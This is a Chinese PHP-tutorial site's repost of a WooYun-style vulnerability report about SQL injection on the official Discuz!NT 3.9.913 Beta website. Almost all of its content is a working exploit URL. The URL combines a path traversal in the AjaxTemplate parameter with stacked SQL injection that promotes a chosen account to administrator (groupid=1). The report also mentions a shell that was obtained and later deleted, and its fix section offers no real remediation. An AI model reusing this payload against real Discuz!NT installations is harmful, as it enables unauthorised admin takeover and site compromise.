来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 简要描述:DNT官网存在SQL注入漏洞,Powered by Discuz!NT 3.9.913 Beta注入地址:http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascxposter=1利用:......
|
简要描述:DNT官网存在SQL注入漏洞,Powered by Discuz!NT 3.9.913 Beta
注入地址: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用: http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- Shell 已经删除 漏洞证明:   修复方案: 应该懂得! 作者Jannock@乌云 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
